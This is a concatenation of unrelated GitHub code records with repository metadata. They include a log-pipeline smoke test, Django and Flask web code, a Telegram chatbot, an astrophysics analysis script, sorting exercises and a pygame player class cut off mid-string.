root path\")\ndef smoke_test(ssm_root: str, timeout: int) -> None:\n \"\"\"Run an end to end test on the pipeline\"\"\"\n cloudwatch_results = send_logs_to_cloudwatch()\n print(\"Sent logs to CloudWatch\")\n start_timestamp = int(datetime.now().timestamp())\n print(\"Polling splunk to find our logs...\")\n\n splunk_credentials = credentials(ssm_root, \"search\")\n splunk = Search(splunk_credentials)\n\n while True:\n duration = int(datetime.now().timestamp()) - start_timestamp\n splunk_results = splunk.search(search_query(test_type=\"smoke_test\"))\n\n if payload_found(cloudwatch_results, splunk_results):\n print(f\"\\n✔️ Pipeline smoketest succeeded in {duration} seconds\")\n sys.exit(0)\n\n if duration > timeout:\n print(\n f\"\\n❌TIMEOUT searching for payload in splunk after {duration} seconds\",\n file=sys.stderr,\n )\n print(\"CloudWatch results: \")\n pprint(cloudwatch_results)\n print(\"\\n\\n\\n\\n\")\n print(\"Splunk results: \")\n pprint(splunk_results)\n print(\n f\"\\n❌ TIMEOUT searching for payload in splunk after {duration} seconds\",\n file=sys.stderr,\n )\n sys.exit(1)\n\n sleep(1)\n print(\".\", end=\"\", flush=True)\n\n\n@generate_cloudwatch_logs.command()\n@click.option(\"-t\", \"--timeout\", type=int, default=600)\n@click.option(\"--ssm\", required=True, help=\"SSM root path\")\ndef load_test(ssm: str, timeout: int) -> None:\n \"\"\"Check Splunk for artillery payloads on the pipeline\"\"\"\n start_timestamp = float(datetime.now().timestamp())\n\n splunk_credentials = credentials(ssm, \"search\")\n splunk = Search(splunk_credentials)\n\n while True:\n\n duration = float(datetime.now().timestamp()) - start_timestamp\n artillery_config = 80000\n requests_completed = int(os.environ.get(\"requests_completed\", artillery_config))\n\n splunk_results = splunk.search(search_query(test_type=\"smoke_test\"))\n\n if load_test_found(splunk_results, artillery_config, requests_completed):\n print(f\"\\n✔️ Pipeline load test succeeded in {duration} seconds\")\n sys.exit(0)\n\n if requests_completed < int(artillery_config * 0.9):\n print(\n f\"\\n❌INSUFFICIENT DATA Artillery has only sent {requests_completed}\"\n f\"requests from a config of {artillery_config}\"\n )\n sys.exit(0)\n\n if duration > timeout:\n print(\n f\"\\n❌TIMEOUT searching for payload in splunk after {duration} seconds\",\n file=sys.stderr,\n )\n print(\"Splunk results: \")\n pprint(splunk_results)\n print(\n f\"\\n❌TIMEOUT searching for payload in splunk after {duration} seconds\",\n file=sys.stderr,\n )\n sys.exit(1)\n\n sleep(1)\n print(\".\", end=\"\", flush=True)\n","repo_name":"alphagov/cybersecuritytools","sub_path":"cybersecuritytools/csls/generate_cloudwatch_logs/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31741581638","text":"\r\nfrom rest_framework import serializers\r\nfrom watchlist_app.models import WatchList, StreamPlatform, Review\r\n\r\n\r\n\r\n\r\nclass ReviewSerializer(serializers.ModelSerializer):\r\n review_user = serializers.StringRelatedField(read_only=True)\r\n class Meta:\r\n model = Review\r\n # fields = \"__all__\"\r\n exclude = ('watchlist',)\r\n \r\nclass WatchListSerializer(serializers.ModelSerializer):\r\n reviews = ReviewSerializer(many=True, read_only = True)\r\n #read only allows to only see reviews during a get request and not add reviews from watchlist in a post request\r\n # len_name = serializers.SerializerMethodField()\r\n class Meta:\r\n model = WatchList\r\n fields = \"__all__\"\r\n # fields = ['id','name','description']\r\n # exclude = ['active']\r\n\r\nclass StreamPlatformSerializer(serializers.HyperlinkedModelSerializer):\r\n watchlist = WatchListSerializer(many=True, read_only = True)\r\n # watchlist = serializers.StringRelatedField(many=True)\r\n class Meta:\r\n model = StreamPlatform\r\n fields = \"__all__\"\r\n # def get_len_name(self, object):\r\n # return len(object.name)\r\n \r\n # def validate_name(self,value):\r\n # if len(value) < 2:\r\n # raise serializers.ValidationError('Length of name is too short')\r\n # return value\r\n \r\n # def validate(self,data):\r\n # if data['name'] == data['description']:\r\n # raise serializers.ValidationError('Name must not be the same as description')\r\n # return data\r\n \r\n\r\n# def name_length(value):\r\n# if len(value) < 2:\r\n# raise serializers.ValidationError('The length is too short')\r\n# return value\r\n\r\n# class MovieSerializer(serializers.Serializer):\r\n# id = serializers.IntegerField(read_only=True)\r\n# name = serializers.CharField(validators=[name_length])\r\n# description = serializers.CharField()\r\n# active = serializers.BooleanField()\r\n \r\n# def create(self, validated_data):\r\n# return Movie.objects.create(**validated_data)\r\n \r\n# def update(self, instance, validated_data):\r\n# instance.name = validated_data.get('name', instance.name)\r\n# instance.description = validated_data.get('description', instance.description)\r\n# instance.active = validated_data.get('active', instance.active)\r\n# instance.save()\r\n# return instance\r\n \r\n #validation is a way of making sure deserialized data is stored in the database properly\r\n #1. Field-level validation.. def validate_fieldname(self,value)\r\n # def validate_name(self,value):\r\n # if len(value) < 2:\r\n # raise serializers.ValidationError('Length of name is too short')\r\n # return value\r\n \r\n #2 OBJECT-LEVEL VALIDATION.. def validate(self,data)\r\n # def validate(self,data):\r\n # if data['name'] == data['description']:\r\n # raise serializers.ValidationError('Name must not be the same as description')\r\n # return data\r\n \r\n #3 Validator, as a function..check top of code","repo_name":"Darkdev007/django-rest-framework","sub_path":"watchlist_app/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72172845929","text":"import telepot\r\nimport aiml\r\nimport time\r\n\r\n\r\ndef on_chat_message(msg):\r\n content_type, chat_type, chat_id = telepot.glance(msg)\r\n if content_type == 'text':\r\n\r\n name = msg[\"from\"][\"first_name\"]\r\n txt = msg['text']\r\n photo_url = \"https://commons.wikimedia.org/wiki/File:Colonia_iulia_felix.jpg#/media/File:Colonia_iulia_felix.jpg\"\r\n\r\n if '/start' in txt:\r\n bot.sendMessage(chat_id, 'ciao')\r\n elif 'alla prossima' in txt:\r\n bot.sendMessage(chat_id, 'Grazie e alla prossima ' + name)\r\n elif 'quando è stato fondato?' in txt:\r\n bot.sendPhoto(chat_id, photo_url,\r\n \"dall'epigrafe rinvenuta si evince che la costruzione dell'anfiteatro risale al I II d.C.\")\r\n else:\r\n print(msg[\"text\"])\r\n r = generate_aiml(msg['text'], chat_id)\r\n if r is not None and r != \"\":\r\n html_message = r.replace(\"\\\\n\", \"\\n\")\r\n bot.sendMessage(chat_id, html_message)\r\n\r\n\r\ndef generate_aiml(text, chat_id):\r\n \r\n reply = kernel.respond(text)\r\n return reply\r\n\r\n\r\nkernel = aiml.Kernel()\r\nkernel.learn(\"startup.xml\")\r\nkernel.respond(\"load aiml b\")\r\nbot = telepot.Bot(\"TOKEN\")\r\n\r\nbot.message_loop(on_chat_message)\r\n\r\n\r\nwhile 1:\r\n time.sleep(30)\r\n","repo_name":"25sal/cleopatra","sub_path":"gamification/chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39054392413","text":"import timeit, sys\nimport numpy as np\nimport healpy as hp\nimport h5py\nfrom functools import partial\nimport schwimmbad\nimport matplotlib.pyplot as plt\nfrom numba import jit\nfrom astropy.cosmology import Planck13 as cosmo\nfrom astropy import units as u\n\nfrom helpers import get_Z_LOS, get_rotation_matrix, get_spherical_from_cartesian, get_cartesian_from_spherical\nsys.path.append('/cosma7/data/dp004/dc-payy1/my_files/flares_pipeline')\nimport flares\n\nconv = (u.solMass/u.Mpc**2).to(u.solMass/u.pc**2)\n\n\n\ndef get_data(ii, tag, inp = 'FLARES'):\n\n num = str(ii)\n if inp == 'FLARES':\n if len(num) == 1:\n num = '0'+num\n\n sim = rF\"../flares_pipeline/data/flares.hdf5\"\n num = num+'/'\n\n else:\n sim = rF\"../flares_pipeline/data/EAGLE_{inp}_sp_info.hdf5\"\n num=''\n\n with h5py.File(sim, 'r') as hf:\n cop = np.array(hf[num+tag+'/Galaxy'].get('COP'), dtype = np.float64)\n mstar = np.array(hf[num+tag+'/Galaxy'].get('Mstar_30'), dtype = np.float64)*1e10\n S_len = np.array(hf[num+tag+'/Galaxy'].get('S_Length'), dtype = np.int64)\n G_len = np.array(hf[num+tag+'/Galaxy'].get('G_Length'), dtype = np.int64)\n S_coords = np.array(hf[num+tag+'/Particle'].get('S_Coordinates'), dtype = np.float64)\n G_coords = np.array(hf[num+tag+'/Particle'].get('G_Coordinates'), dtype = np.float64)\n S_mass = np.array(hf[num+tag+'/Particle'].get('S_MassInitial'), dtype = np.float64)*1e10\n S_Z = np.array(hf[num+tag+'/Particle'].get('S_Z_smooth'), dtype = np.float64)\n S_age = np.array(hf[num+tag+'/Particle'].get('S_Age'), dtype = np.float64)*1e3\n G_mass = np.array(hf[num+tag+'/Particle'].get('G_Mass'), dtype = np.float64)*1e10\n G_sml = np.array(hf[num+tag+'/Particle'].get('G_sml'), dtype = np.float64)\n G_Z = np.array(hf[num+tag+'/Particle'].get('G_Z_smooth'), dtype = np.float64)\n\n begin = np.zeros(len(S_len), dtype = np.int64)\n end = np.zeros(len(S_len), dtype = np.int64)\n begin[1:] = np.cumsum(S_len)[:-1]\n end = np.cumsum(S_len)\n\n gbegin = np.zeros(len(G_len), dtype = np.int64)\n gend = np.zeros(len(G_len), dtype = np.int64)\n gbegin[1:] = np.cumsum(G_len)[:-1]\n gend = np.cumsum(G_len)\n\n\n return cop, mstar, S_coords, G_coords, S_mass, S_Z, S_age, G_mass, G_sml, G_Z, begin, end, gbegin, gend\n\n\n\ndef get_ZLOS(angle, scoords, gcoords, this_gmass, this_gZ, this_gsml, lkernel, kbins):\n\n vector = get_cartesian_from_spherical(angle)\n rot = get_rotation_matrix(vector)\n this_scoords = (rot @ scoords.T).T\n this_gcoords = (rot @ gcoords.T).T\n\n Z_los_SD = get_Z_LOS(this_scoords, this_gcoords, this_gmass, this_gZ, this_gsml, lkernel, kbins)*conv\n\n return Z_los_SD\n\n\nif __name__ == \"__main__\":\n\n ii, tag, sim_type = sys.argv[1], sys.argv[2], sys.argv[3]\n\n # tag='010_z005p000'\n # sim_type='FLARES'\n\n #sph kernel approximations\n kinp = np.load('./data/kernel_sph-anarchy.npz', allow_pickle=True)\n lkernel = kinp['kernel']\n header = kinp['header']\n kbins = header.item()['bins']\n\n # Generate different viewing angles\n nside=8\n hp_theta, hp_phi = hp.pix2ang(nside, range(hp.nside2npix(nside)))\n angles = np.vstack([hp_theta, hp_phi]).T\n\n #For galaxies in region `num`\n num = str(ii)\n if len(num) == 1:\n num = '0'+num\n cop, mstar, S_coords, G_coords, S_mass, S_Z, S_age, G_mass, G_sml, G_Z, begin, end, gbegin, gend = get_data(num, tag, inp = 'FLARES')\n z = float(tag[5:].replace('p','.'))\n cop = cop/(1+z)\n S_coords/=(1+z)\n G_coords/=(1+z)\n\n req_ind = np.where(mstar>10**9.5)[0]\n print (\"Number of selected galaxies = \", len(req_ind))\n filename = F'data/Zlos_inclination_{num}.hdf5'\n fl = flares.flares(fname = filename, sim_type = sim_type)\n fl.create_group(F'{tag}')\n\n for kk, jj in enumerate(req_ind):\n\n #Coordinates and attributes for the jj galaxy in ii region\n scoords = S_coords[:, begin[jj]:end[jj]].T - cop[:,jj]\n gcoords = G_coords[:, gbegin[jj]:gend[jj]].T - cop[:,jj]\n\n this_smass = S_mass[begin[jj]:end[jj]]\n this_gmass = G_mass[gbegin[jj]:gend[jj]]\n\n this_sZ = S_Z[begin[jj]:end[jj]]\n this_gZ = G_Z[gbegin[jj]:gend[jj]]\n\n this_age = S_age[begin[jj]:end[jj]]\n this_gsml = G_sml[gbegin[jj]:gend[jj]]\n\n\n start = timeit.default_timer()\n print (F\"Computing Zlos's for task {kk}/{len(req_ind)}\")\n calc_Zlos = partial(get_ZLOS, scoords=scoords, gcoords=gcoords, this_gmass=this_gmass, this_gZ=this_gZ, this_gsml=this_gsml, lkernel=lkernel, kbins=kbins)\n pool = schwimmbad.MultiPool(processes=16)\n Zlos = np.array(list(pool.map(calc_Zlos, angles)))\n pool.close()\n\n fl.create_dataset(Zlos, F'S_los_{jj}', F'{tag}',\n desc = F'Star particle line-of-sight metal column density along the z-axis for galaxy index {jj} for different viewing angles',\n unit = 'Msun/pc^2')\n\n stop = timeit.default_timer()\n print (F\"Took {np.round(stop - start, 6)/60} minutes\")\n","repo_name":"stephenmwilkins/flares_inclination","sub_path":"calc_los_for_orientations.py","file_name":"calc_los_for_orientations.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70100079528","text":"import logging\nimport sys\n\nLOG_LEVEL = logging.DEBUG\n\n\ndef init_log():\n\tlog = logging.getLogger(__name__)\n\tlog.setLevel(LOG_LEVEL)\n\tconsole = logging.StreamHandler(sys.stderr)\n\tconsole.setLevel(LOG_LEVEL)\n\tfmt = \"[%(levelname)s][%(asctime)s][%(process)d]\" \\\n\t \"logger=%(name)s|tag=%(funcName)s:%(filename)s:%(lineno)d|\" \\\n\t \"content=%(message)s\"\n\tdatefmt = \"%Y-%m-%d %H:%M:%S %z\"\n\tformatter = logging.Formatter(fmt=fmt, datefmt=datefmt)\n\tconsole.setFormatter(formatter)\n\tlog.addHandler(console)\n\treturn log\n\n\nlog = init_log()\n","repo_name":"yuzhiquan/flask_demo","sub_path":"init_log.py","file_name":"init_log.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19847827378","text":"#Declaración de variables y lista\ncant = int(input(f'Cuantos alumnos registrará?\\n'))\nalumnos = dict()\n\n#Ingresar los datos de cada alumno\nfor j in range(cant):\n nom = input(f'Cual es el nombre del alumno N° {j + 1}?\\n')\n canNot = int(input(f'Cuantas notas ingresará para el alumno {nom}?\\n'))\n notas = []\n #Recorremos una lista para ingresar las notas\n for i in range(canNot):\n condi = 1\n \n #Bucle While, perciste hasta que la nota sea correcta y entre 0 y 20\n while True:\n # valida otro valor distinto de numero\n try:\n valor = float(input(f'ingrese la nota {i + 1}\\n'))\n \n except ValueError:\n print('El dato ingresado no es número \\n')\n continue\n \n #valida que se encuntre entre 0 y 20\n if valor > 20 or valor < 0:\n print('La nota ingresada es menor de cero o mayor a 20, por favor corregir \\n')\n continue\n else:#ingresa valor a la lista\n notas.append(valor)\n break \n\n #find e while y agregar datos al diccionario\n alumnos.update(dict(nomAlu = nom, notAlum = notas, min = min(notas), max = max(notas), prom = sum(notas)/len(notas)))\n\nfor clave, valor in alumnos.items():\n print(f' la clave es {clave} y el valor es {valor}')","repo_name":"faquino012/RetoSem3","sub_path":"pregunta3.py","file_name":"pregunta3.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40446211857","text":"#*****************************************************\n#\n#Program Author: Frances Zhao\n#Completion Date: May 6 2021\n#Program Name: Lesson 7_5\n#Description: Ask the user to enter numbers one at a time\n#for each number, x, display –x, and reversed\n#\n#*****************************************************\n\n#prompting the user for a number\nx = float(input(\"Please enter a number: \"))\n\n#outputting the result \nwhile x != 0:\n\tx *= -1\n\tprint(x)\n\tx = float(input(\"Please enter another number: \"))\nprint(\"0 cannot be negative or positive.\")\n\t\n\t","repo_name":"frances-zhao/ICS207","sub_path":"homework/lesson 7/lesson7_5.py","file_name":"lesson7_5.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23144282563","text":"from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom os import environ\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL') or 'mysql+mysqlconnector://root@localhost:3306/esd-restaurant'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nCORS(app)\n\n\nclass Restaurant(db.Model):\n __tablename__ = \"restaurant\"\n\n restaurantID = db.Column(db.Integer, unique = True, primary_key = True)\n restaurantName = db.Column(db.String(100), nullable = False)\n restaurantContact = db.Column(db.String(8), nullable = False)\n restaurantAddress = db.Column(db.String(100), nullable = False)\n postalCode = db.Column(db.Integer, nullable = False)\n\n def __init__(self, restaurantID, restaurantName, restaurantContact, restaurantAddress, postalCode):\n self.restaurantID = restaurantID\n self.restaurantName = restaurantName\n self.restaurantContact = restaurantContact\n self.restaurantAddress = restaurantAddress\n self.postalCode = postalCode\n\n def json(self):\n return {\"restaurantID\" : self.restaurantID, \"restaurantName\" : self.restaurantName, \"restaurantContact\" : self.restaurantContact, \"restaurantAddress\": self.restaurantAddress, \"postalCode\" : self.postalCode}\n\nclass Food(db.Model):\n __tablename__ = \"food\"\n\n foodID = db.Column(db.Integer, unique = True, primary_key = True)\n restaurantID = db.Column(db.Integer, nullable = False)\n foodName = db.Column(db.String(100), nullable = False)\n description = db.Column(db.String(100), nullable = False)\n price = db.Column(db.Float, nullable = False)\n\n def __init__(self, foodID, restaurantID, foodName, description, price):\n self.foodID = foodID\n self.restaurantID = restaurantID\n self.foodName = foodName\n self.description = description\n self.price = price\n\n def json(self):\n return {\"foodID\" : self.foodID, \"restaurantID\" : self.restaurantID, \"foodName\" : self.foodName, \"description\": self.description, \"price\" : self.price}\n\n@app.route(\"/restaurant\")\n\ndef get_all():\n restaurantlist = Restaurant.query.all()\n if len(restaurantlist):\n return jsonify(\n {\n \"code\" : 200,\n \"data\" : {\n \"restaurants\" : [restaurant.json() for restaurant in restaurantlist]\n }\n }\n )\n return jsonify(\n {\n \"code\" : 404,\n \"message\" : \"There are no restaurants.\"\n }\n ), 404\n\n@app.route(\"/restaurant/\")\n\ndef find_by_restaurantID(restaurantID):\n restaurant = Restaurant.query.filter_by(restaurantID = restaurantID).first()\n if restaurant:\n return jsonify(\n {\n \"code\" : 200,\n \"data\" : restaurant.json()\n }\n )\n return jsonify(\n {\n \"code\" : 404,\n \"message\" : \"Restaurant not found.\"\n }\n ), 404\n \n\n@app.route(\"/restaurant/rider/\", methods=[\"GET\"])\ndef find_by_restaurantName(restaurantName):\n restaurant = Restaurant.query.filter_by(restaurantName = restaurantName).first()\n if restaurant:\n return jsonify(\n {\n \"code\" : 200,\n \"data\" : restaurant.json()\n }\n )\n return jsonify(\n {\n \"code\" : 404,\n \"message\" : \"Restaurant not found.\"\n }\n ), 404\n\n@app.route(\"/restaurant/\", methods=[\"POST\"])\n\ndef create_restaurant(restaurantID):\n if (Restaurant.query.filter_by(restaurantID = restaurantID).first()):\n return jsonify(\n {\n \"code\" : 400,\n \"data\" : {\n \"restaurantID\" : restaurantID\n },\n \"message\" : \"Restaurant already exists.\"\n }\n ), 400\n \n data = request.get_json()\n restaurant = Restaurant(restaurantID, **data)\n\n try:\n db.session.add(restaurant)\n db.session.commit()\n except:\n return jsonify(\n {\n \"code\" : 500,\n \"data\" : {\n \"restaurantID\" : restaurantID\n },\n \"message\" : \"An error occurred creating the book.\"\n }\n ), 500\n\n return jsonify(\n {\n \"code\" : 201,\n \"data\" : restaurant.json()\n }\n ), 201\n\n@app.route(\"/restaurant/food/\")\n\ndef find_food_by_restaurantID(restaurantID):\n foods = Food.query.filter_by(restaurantID = restaurantID).all()\n if foods:\n return jsonify(\n {\n \"code\" : 200,\n \"data\" : [food.json() for food in foods]\n }\n )\n return jsonify(\n {\n \"code\" : 404,\n \"message\" : \"Restaurant not found.\"\n }\n ), 404 \n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5005, debug=True)","repo_name":"auyongtingting/kirbyeats-fask","sub_path":"restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70368232488","text":"# Implement Bubble Sort\r\n\r\ndef bubble_sort(arr):\r\n n = len(arr)\r\n\r\n for i in range(n):\r\n\r\n for j in range(0, n-i-1):\r\n if arr[j] > arr[j+1]:\r\n arr[j], arr[j+1] = arr[j+1], arr[j]\r\n return arr\r\n\r\nbubbly = bubble_sort([20,50,30,100,60])\r\nprint(\"Bubble Sorted Array is: \", bubbly)\r\n\r\n# Implement Quick Sort\r\n\r\ndef quick_sort(arr2):\r\n\r\n if len(arr2) <= 1:\r\n return arr2\r\n \r\n pivot = arr2[len(arr2) // 2]\r\n left = []\r\n middle = []\r\n right = []\r\n\r\n for x in arr2:\r\n if x < pivot:\r\n left.append(x)\r\n elif x == pivot:\r\n middle.append(x)\r\n else:\r\n right.append(x)\r\n\r\n return quick_sort(left) + middle + quick_sort(right)\r\n\r\narr2 = [20,30,43,12,100,56,10]\r\nsorted_arr = quick_sort(arr2)\r\nprint(\"Quick Sorted Array is: \", sorted_arr)\r\n","repo_name":"Siddharth1047/code-till-job","sub_path":"Day-3(sort).py","file_name":"Day-3(sort).py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12020817731","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotFound , HttpResponseRedirect\nfrom django.urls import reverse\n\n# Create your views here.\n\n# def index(request):\n# return HttpResponse('Thats Works !')\n\n# def feb(request):\n# return HttpResponse(\"IT's Feb\")\n\nmonthly_challenges = {\n \"january\": \"This is january\",\n \"february\" : \"This is Feb\",\n \"march\" : \"This Is March\",\n \"april\":\"This Is April\",\n \"may\": \"This is May\"\n}\n\n\ndef monthly_challenge_by_number(request, month):\n months = list(monthly_challenges.keys())\n\n if month > len(months):\n return HttpResponseNotFound(\"Invalid Month\")\n\n redirect_month = months[month - 1]\n redirect_path = reverse(\"my-app\",args=[redirect_month]) #/myapp/january \"my-app\"-->myapp////args-->/month\n return HttpResponseRedirect(redirect_path)\n\n\ndef monthly_challenge(request,month):\n try:\n challenge_text = monthly_challenges[month]\n response_data = f\"

    {challenge_text}

    \"\n return HttpResponse(response_data)\n except:\n return HttpResponseNotFound(\"This is not found\") \n ","repo_name":"KirolosTawadros/DjangoChallenge","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70568954090","text":"import numpy as np\r\n\r\ndef block_id(i, j):\r\n r = i // 3\r\n c = j // 3\r\n return 3 * r + c\r\n\r\nclass Solution:\r\n def isValidSudoku(self, board: List[List[str]]) -> bool:\r\n row_state = np.array([False] * 9 * 9, np.bool_).reshape(9, 9)\r\n col_state = np.array([False] * 9 * 9, np.bool_).reshape(9, 9)\r\n block_state = np.array([False] * 9 * 9, np.bool_).reshape(9, 9)\r\n for i in range(9):\r\n for j in range(9):\r\n if board[i][j] != \".\":\r\n num = int(board[i][j])\r\n if row_state[i][num - 1]:\r\n return False\r\n row_state[i][num - 1] = True\r\n if col_state[j][num - 1]:\r\n return False\r\n col_state[j][num - 1] = True\r\n if block_state[block_id(i, j)][num - 1]:\r\n return False\r\n block_state[block_id(i, j)][num - 1] = True\r\n return True\r\n","repo_name":"FennelDumplings/leetcode-maxed_out","sub_path":"algorithm/python/prob1-500/prob32_medium_Valid-Sudoku.py","file_name":"prob32_medium_Valid-Sudoku.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"20829567050","text":"\"\"\"This module creates universities into the city\"\"\"\nimport random\n\n\ndef create_universities(houses):\n \"\"\"\n this function creates universities\n Args:\n houses ([Polygon]): houses of the city\n Returns:\n [Polygon], [Polygon]: new list of houses, universities\n \"\"\"\n universities = []\n new_houses = []\n\n for house in houses:\n if random.randint(0, 35) == 1:\n universities.append(house)\n else:\n new_houses.append(house)\n return new_houses, universities\n","repo_name":"Adrien-ANTON-LUDWIG/Medieval-town-map-generator","sub_path":"src/town_generator/university.py","file_name":"university.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7756527614","text":"from itertools import permutations # 조합\nimport math\n\ndef is_prime_number(n):\n \"\"\"소수판별 함수\"\"\"\n if n == 0 or n == 1: # 0,1 은 소수가 아님\n return False\n else:\n for i in range(2, int(math.sqrt(n)) + 1): # sqrt(n)까지만 for문을 돌면서 확인하면 된다.\n if n % i == 0: # 2~sqrt(num)까지 나누어 떨어지는 숫자가 있으면 소수가 아님\n return False\n return True\n\n\ndef solution(numbers):\n answer = []\n for i in range(1,len(numbers)+1):\n arr = list(permutations(numbers, i))\n for j in range(len(arr)):\n num = int(''.join(map(str,arr[j])))\n if is_prime_number(num):\n answer.append(num)\n\n return len(set(answer))\n\n\ns = [\"17\", \"011\"]\nfor ss in s:\n print(solution(ss))\n","repo_name":"commin-pg/coding_test","sub_path":"com/practice/programmers/소수찾기.py","file_name":"소수찾기.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70838932968","text":"import pygame\nimport settings\n\ndisplay_surface = pygame.display.set_mode((settings.DISPLAY_WIDTH, settings.DISPLAY_HEIGHT))\n\nclass Player(pygame.sprite.Sprite):\n\tdef __init__(self, pos, groups, obstacle_sprites, entrance_sprites):\n\t\tsuper().__init__(groups)\n\n\t\tself.load_animation_sprites()\n\n\t\tself.screen = pygame.display.get_surface()\n\n\t\tself.current_sprite = 0\n\t\tself.image = self.walk_front_frames[self.current_sprite]\n\t\tself.previous_sprite_list = self.walk_front_frames\n\n\t\tself.current_dust = 0\n\t\tself.dust_image = self.dust_right_frames[self.current_dust]\n\n\t\tself.rect = self.image.get_rect(topleft = pos)\n\t\tself.hitbox = self.rect.inflate(-10, 0)\n\n\t\tself.direction = pygame.math.Vector2()\n\t\tself.speed = 3\n\n\t\tself.obstacle_sprites = obstacle_sprites\n\t\tself.entrance_sprites = entrance_sprites\n\n\t\tself.custom_font = pygame.font.Font('./Levels/LevelOne/fonts/ArcadeFont.ttf', 12)\n\n\t\tself.temp_x = 0\n\t\tself.temp_y = 0\n\t\tself.footstep = pygame.mixer.Sound('./SFX/footstep_two.wav')\n\n\tdef input(self): \n\t\tkeys = pygame.key.get_pressed()\n\n\t\tif keys[pygame.K_w] or keys[pygame.K_UP]: \n\t\t\tself.direction.y = -1\n\t\telif keys[pygame.K_s] or keys[pygame.K_DOWN]: \n\t\t\tself.direction.y = 1\n\t\telse: \n\t\t\tself.direction.y = 0\n\n\t\tif keys[pygame.K_d] or keys[pygame.K_RIGHT]: \n\t\t\tself.direction.x = 1\n\t\telif keys[pygame.K_a] or keys[pygame.K_LEFT]: \n\t\t\tself.direction.x = -1\n\t\telse: \n\t\t\tself.direction.x = 0\n\n\n\tdef move(self, speed): \n\t\tif self.direction.magnitude() != 0: \n\t\t\tself.direction = self.direction.normalize() * 2\n\n\t\tif abs(self.hitbox.x - self.temp_x) > 100:\n\t\t\tself.temp_x = self.hitbox.x\n\t\t\tself.footstep.play()\n\t\tif abs(self.hitbox.y - self.temp_y) > 100:\n\t\t\tself.temp_y = self.hitbox.y\n\t\t\tself.footstep.play()\n\n\t\t# here i want to check if the player is walking on the bridge\n\t\t# x coordinates are 1305-1568, y coordinates are 901\n\t\t# if player is on any of these coordinates, i want the y coordinate to be 891\n\t\tif self.hitbox.x >= 1305 and self.hitbox.x <= 1568 and self.hitbox.y == 901:\n\t\t\tself.hitbox.y = 891\n\t\t\tself.hitbox.x += self.direction.x * speed\n\t\t\tself.collision('horizontal')\n\t\telse:\n\t\t\tself.hitbox.x += self.direction.x * speed\n\t\t\tself.collision('horizontal')\n\t\t\tself.hitbox.y += self.direction.y * speed\n\t\t\tself.collision('vertical')\n\n\t\t\n\t\tself.rect.center = self.hitbox.center\n\n\tdef collision(self, direction): \n\t\tif direction == 'horizontal': \n\t\t\tfor sprite in self.obstacle_sprites: \n\t\t\t\tif sprite.hitbox.colliderect(self.hitbox): \n\t\t\t\t\tif self.direction.x > 0: \n\t\t\t\t\t\tself.hitbox.right = sprite.hitbox.left\n\t\t\t\t\tif self.direction.x < 0: \n\t\t\t\t\t\tself.hitbox.left = sprite.hitbox.right\n\n\t\tif direction == 'vertical': \n\t\t\tfor sprite in self.obstacle_sprites: \n\t\t\t\tif sprite.hitbox.colliderect(self.hitbox): \n\t\t\t\t\tif self.direction.y > 0: \n\t\t\t\t\t\tself.hitbox.bottom = sprite.hitbox.top\n\t\t\t\t\tif self.direction.y < 0: \n\t\t\t\t\t\tself.hitbox.top = sprite.hitbox.bottom\n\n\t\tcollided_entrance = pygame.sprite.spritecollideany(self, self.entrance_sprites)\n\t\tif collided_entrance and not settings.transition:\n\t\t\tlevel_request = True\n\t\t\t# video : \n\t\t\tif collided_entrance.level_number == 1 or collided_entrance.level_number == 2 or collided_entrance.level_number == 3:\n\t\t\t\tmessages = ['You are about to enter level ' + str(collided_entrance.level_number) + '.', \n\t\t\t\t\t\t\t'It is not that hard',\n\t\t\t\t\t\t\t'Are you sure you want to enter?',\n\t\t\t\t\t\t\t'Yes (Y) or No (N)']\n\t\t\t# if the user is entering a tutorial:\n\t\t\telif collided_entrance.level_number % 1 == 0.5:\n\t\t\t\tmessages = ['This is a tutorial house.', \n\t\t\t\t\t\t\t'Are you sure you want to enter?',\n\t\t\t\t\t\t\t'Yes (Y) or No (N)']\n\t\t\t# if the user wants to return to the main menu\n\t\t\telif collided_entrance.level_number == -1:\n\t\t\t\tmessages = ['You\\'re going to the main menu.', \n\t\t\t\t\t\t\t'Do you want to 